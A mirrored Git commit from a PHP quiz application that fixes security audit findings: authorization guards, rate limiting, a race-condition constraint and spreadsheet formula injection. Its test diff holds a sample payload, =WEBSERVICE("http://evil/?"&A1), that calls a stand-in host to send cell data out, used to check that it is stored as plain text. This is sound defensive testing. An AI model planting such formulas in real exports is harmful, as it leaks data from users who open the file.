mirror of
https://github.com/MarijnDoeve/TijdVoorDeTest.git
synced 2026-07-14 05:45:18 +02:00
Declare ext-intl/ext-zip requirements and fix security audit findings (#213)
* Declare ext-intl and ext-zip as explicit composer requirements DataExportService uses ZipArchive directly and the Dutch-locale format_datetime Twig filter needs real ext-intl (the polyfill only supports en), but composer.json only declared ext-ctype/ext-iconv. Adding them lets `composer check-platform-reqs` catch a missing extension before a runtime crash. * Add authorization checks to PrepareEliminationController index and viewElimination had no IsGranted guard, unlike every other backoffice/elimination controller, so any authenticated user could prepare or overwrite another season's elimination screens. * Prevent formula injection in spreadsheet exports Answer/candidate text starting with =, +, -, or @ was written to XLSX exports as a live formula rather than plain text. Since seasons can have multiple owners, a co-owner could plant a formula that runs (and can exfiltrate data) when another owner opens the export in Excel. * Add rate limiting to login and season-code entry points Neither /login nor the public season-code guess form (POST /) had any throttling, making both an unlimited brute-force/enumeration oracle. Adds symfony/rate-limiter and enables login_throttling on the main firewall, plus a dedicated per-IP rate limiter on the season-code form. * Add unique constraint to prevent double-submit score inflation A candidate could submit two concurrent POSTs for the same question before either committed, since GivenAnswer had no unique constraint and the "next question" check was subject to a TOCTOU race — each insert was then counted as a correct answer. * Address CodeRabbit review findings Include a Retry-After header on the season-code rate limit, correct stale line references in the security audit doc, and fix a stray comma in the reset-password email.
This commit is contained in:
@@ -4,6 +4,7 @@ declare(strict_types=1);
|
||||
|
||||
namespace Tvdt\Tests\Service;
|
||||
|
||||
use PhpOffice\PhpSpreadsheet\Cell\DataType;
|
||||
use PhpOffice\PhpSpreadsheet\Reader;
|
||||
use PhpOffice\PhpSpreadsheet\Spreadsheet;
|
||||
use PhpOffice\PhpSpreadsheet\Writer;
|
||||
@@ -121,6 +122,26 @@ final class QuizSpreadsheetServiceTest extends TestCase
|
||||
$this->assertCount(3, $second->answers);
|
||||
}
|
||||
|
||||
public function testQuizToXlsxStoresFormulaLikeAnswerTextAsPlainString(): void
|
||||
{
|
||||
$quiz = new Quiz();
|
||||
$question = new Question();
|
||||
$question->question = 'Who missed the assignment?';
|
||||
$question->ordering = 1;
|
||||
$question->addAnswer(new Answer('=WEBSERVICE("http://evil/?"&A1)', isRightAnswer: true));
|
||||
$question->addAnswer(new Answer('Bob', isRightAnswer: false));
|
||||
|
||||
$quiz->addQuestion($question);
|
||||
|
||||
$path = $this->captureXlsx($this->subject->quizToXlsx($quiz));
|
||||
|
||||
$sheet = new Reader\Xlsx()->setReadDataOnly(true)->load($path)->getActiveSheet();
|
||||
$cell = $sheet->getCell('B2');
|
||||
|
||||
$this->assertSame(DataType::TYPE_STRING, $cell->getDataType());
|
||||
$this->assertSame('=WEBSERVICE("http://evil/?"&A1)', $cell->getValue());
|
||||
}
|
||||
|
||||
public function testXlsxToQuizThrowsOnInvalidMimeType(): void
|
||||
{
|
||||
$path = $this->createTempPath('.txt');
|
||||
|
||||
Reference in New Issue
Block a user